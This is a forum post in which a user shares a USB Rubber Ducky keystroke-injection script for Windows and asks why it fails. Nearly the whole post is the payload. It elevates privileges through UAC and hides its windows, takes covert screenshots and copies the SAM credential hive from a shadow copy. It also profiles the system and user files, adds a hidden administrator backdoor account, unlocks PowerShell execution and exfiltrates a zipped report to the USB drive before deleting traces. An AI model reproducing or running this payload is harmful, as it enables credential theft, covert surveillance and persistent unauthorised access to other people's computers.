BlAd373 Posted November 29, 2017 I'm trying to create a script that collects some information from a Windows PC and saves it directly to the Rubber Ducky. Is that possible? What is wrong with this script? REM Recon DELAY 200 GUI r DELAY 100 STRING powershell Start-Process notepad -Verb runAs ENTER DELAY 200 ALT y DELAY 200 ENTER ALT SPACE DELAY 100 STRING m DELAY 100 DOWNARROW REPEAT 100 ENTER STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss') ENTER STRING $userDir = (Get-ChildItem env:\userprofile).value + '\Ducky Report ' + $folderDateTime ENTER STRING $fileSaveDir = New-Item ($userDir) -ItemType Directory ENTER STRING $date = get-date ENTER STRING $style = "<style> table td{padding-right: 10px;text-align: left;}#body {padding:50px;font-family: Helvetica; font-size: 12pt; border: 10px solid black;background-color:white;height:100%;overflow:auto;}#left{float:left; background-color:#C0C0C0;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#right{background-color:#C0C0C0;float:right;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#center{background-color:#C0C0C0;width:98%;height:300px;border: 4px solid black;padding:10px;overflow:scroll;margin:10px;} </style>" ENTER STRING $Report = ConvertTo-Html -Title 'Recon Report' -Head $style > $fileSaveDir'/ComputerInfo.html' ENTER STRING $Report = $Report + "<div id=body><h1>Duck Tool Kit Report</h1><hr size=2><br><h3> Generated on: $Date </h3><br>" ENTER STRING $jpegSaveDir = New-Item $fileSaveDir'\Screenshots' -ItemType Directory ENTER STRING $x = 0 ENTER STRING do { Start-Sleep -Seconds 60 ENTER STRING $jpegName = (get-date).ToString('HHmmss') ENTER STRING $File = "$jpegSaveDir\$jpegName.bmp" ENTER STRING Add-Type -AssemblyName System.Windows.Forms ENTER STRING Add-type -AssemblyName System.Drawing ENTER STRING $Screen = [System.Windows.Forms.SystemInformation]::VirtualScreen ENTER STRING $Width = 
$Screen.Width ENTER STRING $Height = $Screen.Height ENTER STRING $Left = $Screen.Left ENTER STRING $Top = $Screen.Top ENTER STRING $bitmap = New-Object System.Drawing.Bitmap $Width, $Height ENTER STRING $graphic = [System.Drawing.Graphics]::FromImage($bitmap) ENTER STRING $graphic.CopyFromScreen($Left, $Top, 0, 0, $bitmap.Size) ENTER STRING $bitmap.Save($File) ENTER STRING $x++ } while ($x -ne 8); ENTER STRING $SysBootTime = Get-WmiObject Win32_OperatingSystem ENTER STRING $BootTime = $SysBootTime.ConvertToDateTime($SysBootTime.LastBootUpTime)| ConvertTo-Html datetime ENTER STRING $SysSerialNo = (Get-WmiObject -Class Win32_OperatingSystem -ComputerName $env:COMPUTERNAME) ENTER STRING $SerialNo = $SysSerialNo.SerialNumber ENTER STRING $SysInfo = Get-WmiObject -class Win32_ComputerSystem -namespace root/CIMV2 | Select Manufacturer,Model ENTER STRING $SysManufacturer = $SysInfo.Manufacturer ENTER STRING $SysModel = $SysInfo.Model ENTER STRING $OS = (Get-WmiObject Win32_OperatingSystem -computername $env:COMPUTERNAME ).caption ENTER STRING $disk = Get-WmiObject Win32_LogicalDisk -Filter "DeviceID='C:'" ENTER STRING $HD = [math]::truncate($disk.Size / 1GB) ENTER STRING $FreeSpace = [math]::truncate($disk.FreeSpace / 1GB) ENTER STRING $SysRam = Get-WmiObject -Class Win32_OperatingSystem -computername $env:COMPUTERNAME | Select TotalVisibleMemorySize ENTER STRING $Ram = [Math]::Round($SysRam.TotalVisibleMemorySize/1024KB) ENTER STRING $SysCpu = Get-WmiObject Win32_Processor | Select Name ENTER STRING $Cpu = $SysCpu.Name ENTER STRING $HardSerial = Get-WMIObject Win32_BIOS -Computer $env:COMPUTERNAME | select SerialNumber ENTER STRING $HardSerialNo = $HardSerial.SerialNumber ENTER STRING $SysCdDrive = Get-WmiObject Win32_CDROMDrive |select Name ENTER STRING $graphicsCard = gwmi win32_VideoController |select Name ENTER STRING $graphics = $graphicsCard.Name ENTER STRING $SysCdDrive = Get-WmiObject Win32_CDROMDrive |select -first 1 ENTER STRING $DriveLetter = $CDDrive.Drive 
ENTER STRING $DriveName = $CDDrive.Caption ENTER STRING $Disk = $DriveLetter + '\' + $DriveName ENTER STRING $Firewall = New-Object -com HNetCfg.FwMgr ENTER STRING $FireProfile = $Firewall.LocalPolicy.CurrentProfile ENTER STRING $FireProfile = $FireProfile.FirewallEnabled ENTER STRING $Report = $Report + "<div id=left><h3>Computer Information</h3><br><table><tr><td>Operating System</td><td>$OS</td></tr><tr><td>OS Serial Number:</td><td>$SerialNo</td></tr><tr><td>Current User:</td><td>$env:USERNAME </td></tr><tr><td>System Uptime:</td><td>$BootTime</td></tr><tr><td>System Manufacturer:</td><td>$SysManufacturer</td></tr><tr><td>System Model:</td><td>$SysModel</td></tr><tr><td>Serial Number:</td><td>$HardSerialNo</td></tr><tr><td>Firewall is Active:</td><td>$FireProfile</td></tr></table></div><div id=right><h3>Hardware Information</h3><table><tr><td>Hardrive Size:</td><td>$HD GB</td></tr><tr><td>Hardrive Free Space:</td><td>$FreeSpace GB</td></tr><tr><td>System RAM:</td><td>$Ram GB</td></tr><tr><td>Processor:</td><td>$Cpu</td></tr><td>CD Drive:</td><td>$Disk</td></tr><tr><td>Graphics Card:</td><td>$graphics</td></tr></table></div>" ENTER STRING $UserInfo = Get-WmiObject -class Win32_UserAccount -namespace root/CIMV2 | Where-Object {$_.Name -eq $env:UserName}| Select AccountType,SID,PasswordRequired ENTER STRING $UserType = $UserInfo.AccountType ENTER STRING $UserSid = $UserInfo.SID ENTER STRING $UserPass = $UserInfo.PasswordRequired ENTER STRING $IsAdmin = ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] 'Administrator') ENTER STRING $Report = $Report + "<div id=left><h3>User Information</h3><br><table><tr><td>Current User Name:</td><td>$env:USERNAME</td></tr><tr><td>Account Type:</td><td> $UserType</td></tr><tr><td>User SID:</td><td>$UserSid</td></tr><tr><td>Account Domain:</td><td>$env:USERDOMAIN</td></tr><tr><td>Password Required:</td><td>$UserPass</td></tr><tr><td>Current 
User is Admin:</td><td>$IsAdmin</td></tr></table>" ENTER STRING $Report = $Report + '</div>' ENTER STRING $createShadow = (gwmi -List Win32_ShadowCopy).Create('C:\', 'ClientAccessible') ENTER STRING $shadow = gwmi Win32_ShadowCopy | ? { $_.ID -eq $createShadow.ShadowID } ENTER STRING $addSlash = $shadow.DeviceObject + '\' ENTER STRING cmd /c mklink C:\shadowcopy $addSlash ENTER STRING Copy-Item 'C:\shadowcopy\Windows\System32\config\SAM' $fileSaveDir ENTER STRING Remove-Item -recurse -force 'C:\shadowcopy' ENTER STRING $Report = $Report + '<div id=center><h3> Installed Updates</h3>' ENTER STRING $Report = $Report + (Get-WmiObject Win32_QuickFixEngineering -ComputerName $env:COMPUTERNAME | sort-object -property installedon -Descending | ConvertTo-Html Description, HotFixId,Installedon,InstalledBy) ENTER STRING $Report = $Report + '</div>' ENTER STRING $Computer = $env:COMPUTERNAME ENTER STRING $PortList = 0, 21, 22, 23, 25, 79, 80, 110, 113, 119, 135, 137, 139, 143, 389, 443, 445, 1002, 1024, 1030, 1720, 1900, 5000, 8080 ENTER STRING $Report = $Report + '<div id=right><h3>Port Scan of ' + $Computer + '</h3><table>' ENTER STRING foreach ($PortNumber in $PortList) { ENTER STRING $PortCheck = New-Object Net.Sockets.TcpClient ENTER STRING $PortCheck.Connect($Computer, $PortNumber) ENTER STRING if ($PortCheck.Connected) { ENTER STRING $Report = $Report + '<tr><td><b><font color=red>Port ' + $PortNumber + ' is open</font></b></td></tr>'} ENTER STRING else {$Report = $Report + '<tr><td>Port ' + $PortNumber + ' is closed</td></tr>'}} ENTER STRING $Report = $Report + '</table></div>' ENTER STRING $Report = $Report + '<div id=center><h3> Installed Programs</h3> ' ENTER STRING $Report = $Report + (Get-WmiObject -class Win32_Product | ConvertTo-html Name, Version,InstallDate) ENTER STRING $Report = $Report + '</table></div>' ENTER STRING $u = 0 ENTER STRING $allUsb = @(get-wmiobject win32_volume | select Name, Label, FreeSpace) ENTER STRING $Report = $Report + '<div 
id=right><h3>USB Devices</h3><table>' ENTER STRING do { ENTER STRING $gbUSB = [math]::truncate($allUsb[$u].FreeSpace / 1GB) ENTER STRING $Report = $Report + "<tr><td>Drive Name: </td><td> " + $allUsb[$u].Name + $allUsb[$u].Label + "</td><td>Free Space: </td><td>" + $gbUSB + "GB</td></tr>" ENTER STRING Write-Output $fullUSB ENTER STRING $u ++ ENTER STRING } while ($u -lt $allUsb.Count) ENTER STRING $Report = $Report + '</table></div>' ENTER STRING $Report = $Report + '<div id=left><h3>Shared Drives/Devices</h3>' ENTER STRING $Report = $Report + (GET-WMIOBJECT Win32_Share | convertto-html Name, Description, Path) ENTER STRING $Report = $Report + '</div>' ENTER STRING $Report = $Report + '<div id=center><h3>Network Information</h3>' ENTER STRING $Report = $Report + (Get-WmiObject Win32_NetworkAdapterConfiguration -filter 'IPEnabled= True' | Select Description,DNSHostname, @{Name='IP Address ';Expression={$_.IPAddress}}, MACAddress | ConvertTo-Html) ENTER STRING $Report = $Report + '</table></div>' ENTER STRING $Report = $Report + '<div id=center><h3>User Documents (doc,docx,pdf,rar)</h3>' ENTER STRING $Report = $Report + (Get-ChildItem -Path $userDir -Include *.doc, *.docx, *.pdf, *.zip, *.rar -Recurse |convertto-html Directory, Name, LastAccessTime) ENTER STRING $Report = $Report + '</div>' ENTER STRING Net User test test1 /ADD ENTER STRING Net LocalGroup Administrators test /ADD ENTER DELAY 500 STRING reg add 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon\SpecialAccounts\UserList' /v test /t REG_DWORD /d 0 /f ENTER STRING $Report >> $fileSaveDir'/ComputerInfo.html' ENTER STRING function copy-ToZip($fileSaveDir){ ENTER STRING $srcdir = $fileSaveDir ENTER STRING $zipFile = 'C:\Windows\Report.zip' ENTER STRING if(-not (test-path($zipFile))) { ENTER STRING set-content $zipFile ("PK" + [char]5 + [char]6 + ("$([char]0)" * 18)) ENTER STRING (dir $zipFile).IsReadOnly = $false} ENTER STRING $shellApplication = new-object -com shell.application 
ENTER STRING $zipPackage = $shellApplication.NameSpace($zipFile) ENTER STRING $files = Get-ChildItem -Path $srcdir ENTER STRING foreach($file in $files) { ENTER STRING $zipPackage.CopyHere($file.FullName) ENTER STRING while($zipPackage.Items().Item($file.name) -eq $null){ ENTER STRING Start-sleep -seconds 1 }}} ENTER STRING copy-ToZip($fileSaveDir) ENTER STRING $usbPresent = 'False' ENTER STRING do { ENTER STRING $present = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'f:\}' | Measure ENTER STRING if ($present.Count -ge 1){ ENTER STRING $usbPresent = 'True' }Else { ENTER STRING $usbPresent = 'False'}} ENTER STRING until ($usbPresent -eq 'True') ENTER STRING $driveLetter = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'f:\}' | select Name ENTER STRING move-item c:\Windows\Report.zip $driveLetter.Name ENTER STRING remove-item $fileSaveDir -recurse ENTER STRING Remove-Item $MyINvocation.InvocationName ENTER CTRL s DELAY 750 STRING C:\Windows\config-86652.ps1 ENTER DELAY 100 ALT F4 DELAY 100 GUI r DELAY 200 STRING powershell Start-Process cmd -Verb runAs ENTER DELAY 200 ALT y DELAY 200 STRING mode con:cols=14 lines=1 ENTER ALT SPACE DELAY 750 STRING m DELAY 1000 DOWNARROW REPEAT 100 ENTER STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false ENTER DELAY 750 STRING powershell.exe -windowstyle hidden -File C:\Windows\config-86652.ps1 ENTER STRING exit DELAY 100 ENTER